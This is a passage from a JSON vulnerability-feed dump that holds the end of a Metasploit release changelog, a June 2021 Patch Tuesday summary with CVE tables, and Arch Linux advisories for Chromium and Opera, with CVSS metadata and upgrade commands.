`auxiliary/scanner/http/dell_idrac` module by cleaning up the code, adding the `last_attempted_at` field to `create_credential_login` to prevent a crash, and adding documentation for the module.\n\n## Bugs Fixed\n\n * [#15111](<https://github.com/rapid7/metasploit-framework/pull/15111>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.\n * [#15116](<https://github.com/rapid7/metasploit-framework/pull/15116>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a bug that would occur when importing newer Acunetix reports into the database due to a change in how the timestamp is formatted.\n * [#15120](<https://github.com/rapid7/metasploit-framework/pull/15120>) from [pedrib](<https://github.com/pedrib>) \\- Fixes a regression within `tools/modules/module_author.rb ` so that it runs without crashing\n * [#15140](<https://github.com/rapid7/metasploit-framework/pull/15140>) from [wvu-r7](<https://github.com/wvu-r7>) \\- `msftidy_docs.rb` now doesn't double warn on optional (and missing) `Options` headers.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-29T10%3A54%3A48-05%3A00..2021-05-05T09%3A27%3A49-04%3A00%22>)\n * [Full diff 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/compare/6.0.42...6.0.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-07T19:41:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21425", "CVE-2021-22502"], "modified": "2021-05-07T19:41:01", "id": "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "href": "https://blog.rapid7.com/2021/05/07/metasploit-wrap-up-110/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T09:07:00", "description": "\n\nIt is another low volume Patch Tuesday this month as Microsoft releases fixes for 50 vulnerabilities. This should not diminish the importance of speedily applying the updates. 6 of the vulnerabilities being patched this month are 0-days under active exploitation ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), [CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>)). These patches should be given immediate priority. Luckily they can all be addressed by normal operating system patches and should not require additional manual intervention. Additionally, Enterprises should take action on [CVE-2021-31962](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31962>) if they use Kerberos in their environment as it may allow an attacker to bypass Kerberos authentication altogether.\n\n## Windows MSHTML Platform Remote Code Execution Vulnerability ([CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>))\n\nThis is the only 0-day vulnerability this month which results in a remote code execution. The vulnerability lies within the MSHTML platform which is used by Internet Explorer 11 and Edge Legacy. While these two products are no longer fully supported (Edge Legacy is end of life and IE 11 is no longer supported on certain platforms) the underlying HTML libraries continue to be updated as other applications can make use of it. Further details for this vulnerability will be published by Google's Threat Analysis Group within the next 30 days.\n\n## Kerberos AppContainer Security Feature Bypass Vulnerability ([CVE-2021-31962](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31962>))\n\nWhile this vulnerability has not been exploited in the wild yet, it would be a rather juicy target for exploit developers. Were this to be exploited it may allow a complete bypass of Kerberos authentication, allowing a connection without a password. Kerberos is generally used in Enterprise environments and as such sysadmins should patch this if they are leveraging the strong cryptography authentication mechanism.\n\n## Multiple Elevation of Privilege 0-days \n\n### [CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), [CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), and [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>)\n\n \nThe rest of the 0-days this month can result in elevation of privilege. These vulnerabilities are often chained with other vulnerabilities in order to achieve code execution as an Administrator. Luckily for defenders, these vulnerabilities are simply patched using the traditional update methods.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Apps Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31945>) | Paint 3D Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31946>) | Paint 3D Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31983](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31983>) | Paint 3D Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31980>) | Microsoft Intune Management Extension Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-31942](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31942>) | 3D Viewer Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31943](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31943>) | 3D Viewer Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31944>) | 3D Viewer Information Disclosure Vulnerability | No | No | 5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-33741](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33741>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31938>) | Microsoft VsCode Kubernetes Tools Extension Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2021-31957](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31957>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | No | 5.9 | No \n \n## ESU Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31968>) | Windows Remote Desktop Services Denial of Service Vulnerability | No | Yes | 7.5 | No \n[CVE-2021-1675](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1675>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31958>) | Windows NTLM Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) | Windows NTFS Elevation of Privilege Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) | Windows MSHTML Platform Remote Code Execution Vulnerability | Yes | No | 7.5 | Yes \n[CVE-2021-31971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31971>) | Windows HTML Platform Security Feature Bypass Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-31973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31973>) | Windows GPSVC Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31953](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31953>) | Windows Filter Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26414>) | Windows DCOM Server Security Feature Bypass | No | No | 4.8 | Yes \n[CVE-2021-31954](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31954>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31959>) | Scripting Engine Memory Corruption Vulnerability | No | No | 6.4 | Yes \n[CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) | Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability | Yes | No | 5.2 | Yes \n[CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) | Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability | Yes | No | 5.2 | Yes \n[CVE-2021-31962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31962>) | Kerberos AppContainer Security Feature Bypass Vulnerability | No | No | 9.4 | Yes \n \n## Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31964>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-31948](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31948>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-31950](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31950>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-31966](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31966>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | No \n[CVE-2021-31963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31963>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No \n[CVE-2021-26420](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26420>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.1 | No \n[CVE-2021-31965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31965>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-31949](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31949>) | Microsoft Outlook Remote Code Execution Vulnerability | No | No | 6.7 | Yes \n[CVE-2021-31940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31940>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31941](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31941>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31939>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31985](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31985>) | Microsoft Defender Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31978>) | Microsoft Defender Denial of Service Vulnerability | No | No | 5.5 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-31970](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31970>) | Windows TCP/IP Driver Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2021-31952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31952>) | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) | Windows Kernel Information Disclosure Vulnerability | Yes | No | 5.5 | Yes \n[CVE-2021-31951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31951>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31977](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31977>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 8.6 | Yes \n[CVE-2021-31969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31969>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-31960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31960>) | Windows Bind Filter Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-31967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31967>) | VP9 Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-31975](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31975>) | Server for NFS Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-31976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31976>) | Server for NFS Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-31974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31974>) | Server for NFS Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) | Microsoft DWM Core Library Elevation of Privilege Vulnerability | Yes | Yes | 8.4 | Yes \n[CVE-2021-31972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31972>) | Event Tracing for Windows Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2021-06-08T10:00:00", "type": "rapid7blog", "title": "Patch Tuesday - June 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-26420", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31938", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31942", "CVE-2021-31943", "CVE-2021-31944", "CVE-2021-31945", "CVE-2021-31946", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31957", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-31978", "CVE-2021-31980", "CVE-2021-31983", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33741", "CVE-2021-33742"], "modified": "2021-06-08T10:00:00", "id": "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "href": "https://blog.rapid7.com/2021/06/08/patch-tuesday-june-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:54", "description": "Arch Linux Security Advisory ASA-202104-7\n=========================================\n\nSeverity: High\nDate : 2021-04-29\nCVE-ID : CVE-2021-21222 CVE-2021-21223 CVE-2021-21224 CVE-2021-21225\nCVE-2021-21226\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1843\n\nSummary\n=======\n\nThe package chromium before version 90.0.4430.85-1 is vulnerable to\nmultiple issues including arbitrary code execution and sandbox escape.\n\nResolution\n==========\n\nUpgrade to 90.0.4430.85-1.\n\n# pacman -Syu \"chromium>=90.0.4430.85-1\"\n\nThe problems have been fixed upstream in version 90.0.4430.85.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-21222 (sandbox escape)\n\nHeap buffer overflow in V8 in Google Chrome prior to 90.0.4430.85\nallowed a remote attacker who had compromised the renderer process to\nbypass site isolation via a crafted HTML page.\n\n- CVE-2021-21223 (sandbox escape)\n\nInteger overflow in Mojo in Google Chrome prior to 90.0.4430.85 allowed\na remote attacker who had compromised the renderer process to\npotentially perform a sandbox escape via a crafted HTML page.\n\n- CVE-2021-21224 (arbitrary code execution)\n\nType confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a\nremote attacker to execute arbitrary code inside a sandbox via a\ncrafted HTML page. Google is aware of reports that exploits for this\nissue exist in the wild.\n\n- CVE-2021-21225 (arbitrary code execution)\n\nOut of bounds memory access in V8 in Google Chrome prior to\n90.0.4430.85 allowed a remote attacker to potentially exploit heap\ncorruption via a crafted HTML page.\n\n- CVE-2021-21226 (sandbox escape)\n\nUse after free in navigation in Google Chrome prior to 90.0.4430.85\nallowed a remote attacker who had compromised the renderer process to\npotentially perform a sandbox escape via a crafted HTML page.\n\nImpact\n======\n\nAn attacker can escape the site isolation sandbox through a compromised\nrendered process. In addition, an attacker can execute arbitrary code\nand escape the sandbox through a crafted HTML page.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\nhttps://crbug.com/1194046\nhttps://crbug.com/1195308\nhttps://crbug.com/1195777\nhttps://crbug.com/1195977\nhttps://crbug.com/1197904\nhttps://security.archlinux.org/CVE-2021-21222\nhttps://security.archlinux.org/CVE-2021-21223\nhttps://security.archlinux.org/CVE-2021-21224\nhttps://security.archlinux.org/CVE-2021-21225\nhttps://security.archlinux.org/CVE-2021-21226", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-29T00:00:00", "type": "archlinux", "title": "[ASA-202104-7] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-04-29T00:00:00", "id": "ASA-202104-7", "href": "https://security.archlinux.org/ASA-202104-7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:55", "description": "Arch Linux Security Advisory ASA-202104-5\n=========================================\n\nSeverity: High\nDate : 2021-04-29\nCVE-ID : CVE-2021-21201 CVE-2021-21202 CVE-2021-21203 CVE-2021-21207\nCVE-2021-21209 CVE-2021-21210 CVE-2021-21213 CVE-2021-21214\nCVE-2021-21215 CVE-2021-21216 CVE-2021-21217 CVE-2021-21218\nCVE-2021-21219 CVE-2021-21221 CVE-2021-21222 CVE-2021-21223\nCVE-2021-21224 CVE-2021-21225 CVE-2021-21226\nPackage : opera\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1840\n\nSummary\n=======\n\nThe package opera before version 76.0.4017.94-1 is vulnerable to\nmultiple issues including arbitrary code execution, information\ndisclosure, sandbox escape and content spoofing.\n\nResolution\n==========\n\nUpgrade to 76.0.4017.94-1.\n\n# pacman -Syu \"opera>=76.0.4017.94-1\"\n\nThe problems have been fixed upstream in version 76.0.4017.94.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-21201 (sandbox escape)\n\nUse after free in permissions in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker who had compromised the renderer process to\npotentially perform a sandbox escape via a crafted HTML page.\n\n- CVE-2021-21202 (sandbox escape)\n\nUse after free in extensions in Google Chrome prior to 90.0.4430.72\nallowed an attacker who convinced a user to install a malicious\nextension to potentially perform a sandbox escape via a crafted Chrome\nExtension.\n\n- CVE-2021-21203 (arbitrary code execution)\n\nUse after free in Blink in Google Chrome prior to 90.0.4430.72 allowed\na remote attacker to potentially exploit heap corruption via a crafted\nHTML page.\n\n- CVE-2021-21207 (sandbox escape)\n\nUse after free in IndexedDB in Google Chrome prior to 90.0.4430.72\nallowed an attacker who convinced a user to install a malicious\nextension to potentially perform a sandbox escape via a crafted Chrome\nExtension.\n\n- CVE-2021-21209 (information disclosure)\n\nInappropriate implementation in storage in Google Chrome prior to\n90.0.4430.72 allowed a remote attacker to leak cross-origin data via a\ncrafted HTML page.\n\n- CVE-2021-21210 (information disclosure)\n\nInappropriate implementation in Network in Google Chrome prior to\n90.0.4430.72 allowed a remote attacker to potentially access local UDP\nports via a crafted HTML page.\n\n- CVE-2021-21213 (arbitrary code execution)\n\nUse after free in WebMIDI in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n- CVE-2021-21214 (arbitrary code execution)\n\nUse after free in Network API in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted Chrome Extension.\n\n- CVE-2021-21215 (content spoofing)\n\nInappropriate implementation in Autofill in Google Chrome prior to\n90.0.4430.72 allowed a remote attacker to spoof security UI via a\ncrafted HTML page.\n\n- CVE-2021-21216 (content spoofing)\n\nInappropriate implementation in Autofill in Google Chrome prior to\n90.0.4430.72 allowed a remote attacker to spoof security UI via a\ncrafted HTML page.\n\n- CVE-2021-21217 (information disclosure)\n\nUninitialized data in PDFium in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker to obtain potentially sensitive information\nfrom process memory via a crafted PDF file.\n\n- CVE-2021-21218 (information disclosure)\n\nUninitialized data in PDFium in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker to obtain potentially sensitive information\nfrom process memory via a crafted PDF file.\n\n- CVE-2021-21219 (information disclosure)\n\nUninitialized data in PDFium in Google Chrome prior to 90.0.4430.72\nallowed a remote attacker to obtain potentially sensitive information\nfrom process memory via a crafted PDF file.\n\n- CVE-2021-21221 (information disclosure)\n\nInsufficient validation of untrusted input in Mojo in Google Chrome\nprior to 90.0.4430.72 allowed a remote attacker who had compromised the\nrenderer process to leak cross-origin data via a crafted HTML page.\n\n- CVE-2021-21222 (sandbox escape)\n\nHeap buffer overflow in V8 in Google Chrome prior to 90.0.4430.85\nallowed a remote attacker who had compromised the renderer process to\nbypass site isolation via a crafted HTML page.\n\n- CVE-2021-21223 (sandbox escape)\n\nInteger overflow in Mojo in Google Chrome prior to 90.0.4430.85 allowed\na remote attacker who had compromised the renderer process to\npotentially perform a sandbox escape via a crafted HTML page.\n\n- CVE-2021-21224 (arbitrary code execution)\n\nType confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a\nremote attacker to execute arbitrary code inside a sandbox via a\ncrafted HTML page. Google is aware of reports that exploits for this\nissue exist in the wild.\n\n- CVE-2021-21225 (arbitrary code execution)\n\nOut of bounds memory access in V8 in Google Chrome prior to\n90.0.4430.85 allowed a remote attacker to potentially exploit heap\ncorruption via a crafted HTML page.\n\n- CVE-2021-21226 (sandbox escape)\n\nUse after free in navigation in Google Chrome prior to 90.0.4430.85\nallowed a remote attacker who had compromised the renderer process to\npotentially perform a sandbox escape via a crafted HTML page.\n\nImpact\n======\n\nAn attacker is able to break out of the sandbox, execute arbitrary\ncode, spoof content, read sensitive data, and bypass extension security\npolicies through various means.\n\nReferences\n==========\n\nhttps://blogs.opera.com/desktop/changelog-for-75/\nhttps://blogs.opera.com/desktop/changelog-for-76/\nhttps://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_14.html\nhttps://crbug.com/1025683\nhttps://crbug.com/1188889\nhttps://crbug.com/1192054\nhttps://crbug.com/1185732\nhttps://crbug.com/1143526\nhttps://crbug.com/1184562\nhttps://crbug.com/1161806\nhttps://crbug.com/1170148\nhttps://crbug.com/1172533\nhttps://crbug.com/1173297\nhttps://crbug.com/1166462\nhttps://crbug.com/1166478\nhttps://crbug.com/1166972\nhttps://crbug.com/1195333\nhttps://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html\nhttps://crbug.com/1194046\nhttps://crbug.com/1195308\nhttps://crbug.com/1195777\nhttps://crbug.com/1195977\nhttps://crbug.com/1197904\nhttps://security.archlinux.org/CVE-2021-21201\nhttps://security.archlinux.org/CVE-2021-21202\nhttps://security.archlinux.org/CVE-2021-21203\nhttps://security.archlinux.org/CVE-2021-21207\nhttps://security.archlinux.org/CVE-2021-21209\nhttps://security.archlinux.org/CVE-2021-21210\nhttps://security.archlinux.org/CVE-2021-21213\nhttps://security.archlinux.org/CVE-2021-21214\nhttps://security.archlinux.org/CVE-2021-21215\nhttps://security.archlinux.org/CVE-2021-21216\nhttps://security.archlinux.org/CVE-2021-21217\nhttps://security.archlinux.org/CVE-2021-21218\nhttps://security.archlinux.org/CVE-2021-21219\nhttps://security.archlinux.org/CVE-2021-21221\nhttps://security.archlinux.org/CVE-2021-21222\nhttps://security.archlinux.org/CVE-2021-21223\nhttps://security.archlinux.org/CVE-2021-21224\nhttps://security.archlinux.org/CVE-2021-21225\nhttps://security.archlinux.org/CVE-2021-21226", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-29T00:00:00", "type": "archlinux", "title": "[ASA-202104-5] opera: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21207", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-04-29T00:00:00", "id": "ASA-202104-5", "href": "https://security.archlinux.org/ASA-202104-5", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello everyone! Let's now talk about Microsoft Patch Tuesday vulnerabilities for the second quarter of 2021. April, May and June. Not the most exciting topic, I agree. I am surprised that someone is reading or watching this. For me personally, this is a kind of tradition. Plus this is an opportunity to try Vulristics in action and find possible problems. It is also interesting to see what VM vendors considered critical back then and what actually became critical. I will try to keep this video short.\n\nFirst of all, let's take a look at the vulnerabilities from the April Patch Tuesday. 108 vulnerabilities, 55 of them are RCEs. Half of these RCEs (27) are 